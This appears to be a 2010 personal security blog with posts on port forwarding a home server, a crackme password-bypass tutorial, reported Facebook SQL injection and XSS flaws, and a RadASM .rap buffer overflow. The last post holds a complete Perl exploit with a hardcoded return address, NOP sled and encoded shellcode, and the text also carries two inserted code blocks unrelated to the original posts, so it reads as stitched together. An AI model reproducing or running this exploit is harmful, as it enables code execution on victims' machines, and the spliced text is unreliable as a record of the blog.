Tuesday, September 21, 2010

Publishing a home-made server

Hey Guys,

Many days ago, I was trying to make my own FTP server on my main desktop machine and ran into some problems, but fortunately they were fixed successfully.

I'm going to write a little walkthrough on how to publish a home-made server in such a way that people all around the world can access it and download from it.

PS: This method works for any port you need to open on your PC; the only difference is the port number.

First, you will need a program that runs the server on your machine. For example, if you are using Microsoft Windows, you will have to install Microsoft Internet Information Services (IIS); if you have an Ubuntu machine (or Linux generally), there are many programs for that, such as Apache, vsftpd and others.

Second step (actually THE MOST IMPORTANT step): you will need to forward the port to your local machine's IP address on your network. For example, if you want to open port 21, you must open your ADSL modem's configuration page (which is always your local machine's IP address with '1' at the end; for example, if your local IP address is 192.168.0.52, then your ADSL modem's page will be at 192.168.0.1), then go to the Advanced tab (on most modems) and choose "Port Forwarding"; some ADSL modems label that option "Virtual Server". There you enter the service name and your local IP address.
Example ::>
My ADSL modem is an ADSL Wireless 11g Firewall Router (OfficeConnect/3Com):

I've seen many ADSL modems that have the Virtual Server/Port Forwarding option under the Advanced tab; in my modem, it's under the Firewall tab:

Then we have to choose the service for the port, if it is a popular one (I mean NOT a backdoor, if the user is a pentester or a security professional):


And as shown, I've entered the last number of my local IP address (192.168.1.7).
And that's all. Now every packet sent to the ADSL modem's IP address on the forwarded port will be redirected to your local machine, which must have that port open to receive the packets.
Now all you have to do is publish ftp://<WAN IP Address>.
The WAN IP address can be found on any of these sites :>
1)  Site One
2)  Site Two
3)  Site Three
Example:>
If your WAN IP is 43.235.16.233, then you will share your server like so :>
ftp://43.235.16.233/ << if your server is offering FTP services.
http://43.235.16.233/ << if your server is a usual HTTP server.


You can also give your IP a domain name, either a free one or a purchased one, by pointing the domain to your ADSL modem's IP address.
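For the second step above, the router's configuration page lives at the machine's default gateway, which on Linux can be read from the routing table instead of being guessed. The following is an added example, not code from the original post; the route table embedded in it is a constructed sample, and the function names are illustrative.

```python
import socket
import struct

RTF_UP, RTF_GATEWAY = 0x1, 0x2  # route flags from <linux/route.h>

# Constructed sample in /proc/net/route format for a LAN whose router is NOT at .1
SAMPLE_ROUTE_TABLE = """\
Iface\tDestination\tGateway\tFlags\tRefCnt\tUse\tMetric\tMask\tMTU\tWindow\tIRTT
eth0\t00000000\tFE01A8C0\t0003\t0\t0\t100\t00000000\t0\t0\t0
eth0\t0001A8C0\t00000000\t0001\t0\t0\t100\t00FFFFFF\t0\t0\t0
"""

def hex_le_to_ip(field):
    """Decode the hex IPv4 form of /proc/net/route (little-endian host assumed)."""
    return socket.inet_ntoa(struct.pack("<L", int(field, 16)))

def default_gateway(route_table):
    """Return the gateway of the default route (destination 0.0.0.0), or None."""
    for line in route_table.splitlines()[1:]:      # skip the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        dest, gateway, flags = fields[1], fields[2], int(fields[3], 16)
        if dest == "00000000" and flags & RTF_UP and flags & RTF_GATEWAY:
            return hex_le_to_ip(gateway)
    return None

def dot_one_guess(local_ip):
    """The rule of thumb from the text: the local address ending in '1'."""
    return local_ip.rsplit(".", 1)[0] + ".1"

if __name__ == "__main__":
    try:
        with open("/proc/net/route") as fh:        # live table on Linux
            table = fh.read()
    except OSError:
        table = SAMPLE_ROUTE_TABLE                 # constructed sample otherwise
    print("router address:", default_gateway(table))
```

In the constructed sample the router sits at 192.168.1.254, so the ".1" guess for a host at 192.168.1.7 would point at the wrong address.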

Regards
Jacky

Friday, July 2, 2010

Little Cracking Tutorial

Hey Guys ,

After finishing my exams, I decided to make a little program that asks the user for a valid password, so that we can crack it.
Well, here is the program code ::>


When you execute the program and feed it a wrong password guess, it will give you this message ::>
Excellent, so now we know that the program scans our input and checks whether it is the right password or not.

Let's dig deeper: we will open it in a debugger (I'm using Immunity, but you can use your favorite one):
Now we are going to search for all the text and strings in the program, hoping to find something useful:
We will find that there are many strings; we will work with the one we know, which is " Enter your password: ":
Now double-click on the string that we have chosen. We land in an area full of instructions with some jumps, which I will talk about later on:
If we look deeper, we will notice (with a basic knowledge of assembly) the instruction of the test case: it tests whether the user input is equal to the string or not; if it is, the zero flag (ZF) will be equal to 0, and if it is not, it will be equal to 1. After that, we should also notice the JNZ instruction ::>
This instruction makes the execution flow go to the message ( Sorry, wrong Guess ), which belongs to the address ( 0040136D ). So now we need the program to take our password and tell us that it is a right guess. We have two choices here: the first is to change the jump-if-not-zero instruction to jump-if-zero ( JZ ), and the second is to change the address of the message,
so that instead of jumping to ( Sorry , wrong guess ) it will jump to ( Nice guess ), and of course all that in the case where we entered a wrong password, so the zero flag will be equal to 1 ::>
Of course, you should have noticed that the address of the other message is 0040135F. Now if we save our work, launch the program and feed it any wrong password, it will give us ::>
OK, now that we have cracked that little program, there is a great site where anyone can practice their cracking skills: http://crackmes.de .
PS: You can cause a stack overflow in that program by filling the password with a very large number of characters ( more than 500 ).

Friday, May 7, 2010

Facebook, when pets become gnarled!

Hey guys,
Today I've read various posts about some dangerous vulnerabilities in the Facebook site, so I decided to share them with you to help you avoid such attacks (another reason is that people trust that site very much and share their real information on it, which would be, as in this case, very risky)!
So what's Facebook? Facebook is a social networking site which recently became the first social site in the world; the site has more than 400 million active users all over the world (believe it!).
From Inj3ct0r's site: they were able to find an SQL injection vulnerability in one of Facebook's applications, http://apps.facebook.com/tvshowchat/show.php?id=1 , and then they listed a number of users and their accounts (now I think you know why sharing real information is risky! Not yet? Well, continue...).
What is more dangerous is that they were able to upload a PHP shell which is able to control the Facebook server!
Now they could change accounts, steal passwords, modify whatever article they want, etc...
Furthermore, that's not the only vulnerability discovered. They also discovered an XSS vulnerability in the way that Facebook completes your search string to bring you exactly what you need, quickly.
When you want to search for something, you go to the search bar and type in (only the first letters of) what you want, and then you will notice that Facebook completes your string with some of those that are known to the site. Say that you need to search for a group: you type the first letters and then the site suggests some of its known groups. Well, that's not that hard; we can make this kind of search with this block of HTML code:
<img src=
<br><br><br>
<textarea
So, in this case, if you tried to search for the word iframe (and there is something called iframe), Facebook will complete your string, and then it will be rendered as HTML code (incredible, isn't it?)!!!
Also, there are a couple of vulnerabilities that were discovered by Alexander Sotirov; one interesting one among them is the invalid UTF8 characters vulnerability!

Well, now I guess that you may want to delete your Facebook account! Hey, life is not that bad :P
Facebook is still * The One * and the most interesting social site. But remember, there isn't any site that has a hundred percent secure structure (unless all hackers die!!!).

Regards

Thursday, February 11, 2010

Radasm .rap stack buffer overflow!

Hey guys,
While I was checking for new vulnerabilities, I found this exploit for a program named Radasm, which suffers from a buffer overflow when opening a malicious .rap file with the right header and the right end-header (as I call it).
Here is the original exploit ::> http://www.exploit-db.com/exploits/11400 ( It wasn't discovered by me; it was discovered by Dz_attacker, so all rights are reserved to him! )
After a little fuzzing, I noticed that the header was ::>
[Project]
Assembler=masm
Group=1
GroupExpand=1
[Files]
1=AVP [JUNK-STUFF AREA]
And the end-header was ::>
2=AVP Over.Inc
[MakeFiles]
0=AVP Over.res
[MakeDef]
Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1
2=3,O,$B\ML.EXE /c /coff /Cp /no6Cogo /I"$I",2
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
7=0,0,"$E\OllyDbg",5
[Group]
Group=Added files,Assembly,Resources,Misc,Modules
1=1
Well, I tried to just copy/paste the header and the end-header into my code and put the shellcode in the middle, and the same thing happened (PWNED!).
But Dz_attacker did the right thing by transforming the header and the end-header into hex-byte characters, because anyone who just copies and pastes it like me has to do some important things (like putting a backslash before every " so it becomes \", and also before every backslash so it becomes \\).
That was boring and long, but interesting (at least for me :P)!
And here is my vulnerability script written in Perl ::>
#!/usr/bin/perl -w
my $file="Crash.rap";
my $header="[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1=AVP ";
# "$" is escaped so Perl writes $B, $I, $L, $5 and $E literally instead of interpolating undefined variables
my $end="\n2=AVP Over.Inc\n[MakeFiles]\n0=AVP Over.res\n[MakeDef]\nMenu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0\n1=4,O,\$B\\RC.EXE /v,1\n2=3,O,\$B\\ML.EXE /c /coff /Cp /no6Cogo /I\"\$I\",2\n3=5,O,\$B\\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:\"\$L\" /OUT:\"\$5\",3\n4=0,0,,5\n5=rsrc.obj,O,\$B\\CVTRES.EXE,rsrc.res\n6=*.obj,O,\$B\\ML.EXE /c /coff /Cp /nologo /I\"\$I\",*.asm\n7=0,0,\"\$E\\OllyDbg\",5\n[Group]\nGroup=Added files,Assembly,Resources,Misc,Modules\n1=1";
my $junk="A"x257;
my $eip=pack('V',0x7E4456F7); #7E4456F7 from USER32.dll <<<<< !!!
my $presc="SEXYSEXYSEXY";
my $esp="\x90"x20;
$esp=$esp."\xd9\xc5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x11\xba\x83\x9b" .
"\x0c\x12\x31\x57\x18\x03\x57\x18\x83\xc7\x87\x79\xf9\x7a" .
"\xc3\x5d\x22\x7b\xa3\xcd\x75\x35\x76\x86\x14\xe9\x55\x76" .
"\x8f\xc9\xf1\x13\x2e\x62\x8b\xb2\xc4\x0b\x03\x16\x40\x8f" .
"\xa6\xf0\xe6\x2e\x26\x21\x9f\xf3\xd9\x53\x3a\x7d\xc3\xa5" .
"\x1f\x2e\x5d\x90\xcc\x6a\x8d\x1b\xb6\xf2\xb2\xf7\x09\xd0" .
"\x1f\x43\x7b\x2d\x1e\xcf\x83\x62";
open(INI,">$file") or die "Cannot open $file: $!";
print INI $header.$junk.$eip.$presc.$esp.$end;
close(INI);

And here is the result ::>
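A defensive counterpart to the file layout described above: a scanner that inspects the [Files] section of a .rap project before it is opened and flags entries that are oversized or carry non-text bytes. This is an added example, not code from the original post or from RadASM; the 260-byte limit is an assumption (Windows MAX_PATH), and both sample files are constructed and contain only filler bytes.

```python
import re

LIMIT = 260  # assumed bound (Windows MAX_PATH); not a value taken from RadASM
SECTION = re.compile(rb"\[([^\]]+)\]")

# Constructed samples: a normal project and one with an oversized [Files] entry
BENIGN = (b"[Project]\r\nAssembler=masm\r\n[Files]\r\n1=Demo.Asm\r\n"
          b"2=Demo.Inc\r\n[MakeFiles]\r\n0=Demo.res\r\n")
OVERSIZED = (b"[Project]\nAssembler=masm\n[Files]\n1=AVP " + b"A" * 300 +
             b"\x90\x90\n2=AVP Over.Inc\n[MakeFiles]\n0=AVP Over.res\n")

def scan_rap(data, limit=LIMIT):
    """Return (line_no, key, reason) findings for entries in the [Files] section."""
    findings, section = [], None
    for line_no, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip(b" \t")
        header = SECTION.fullmatch(line)
        if header:
            section = header.group(1).lower()
            continue
        if section != b"files" or not line:
            continue
        key, sep, value = line.partition(b"=")
        if not sep:
            # Binary data containing CR/LF splits an entry; the rest lands here
            findings.append((line_no, "", "malformed"))
            continue
        name = key.decode("ascii", "replace")
        if len(value) > limit:
            findings.append((line_no, name, "too_long"))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((line_no, name, "non_printable"))
    return findings

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, scan_rap(sample))
```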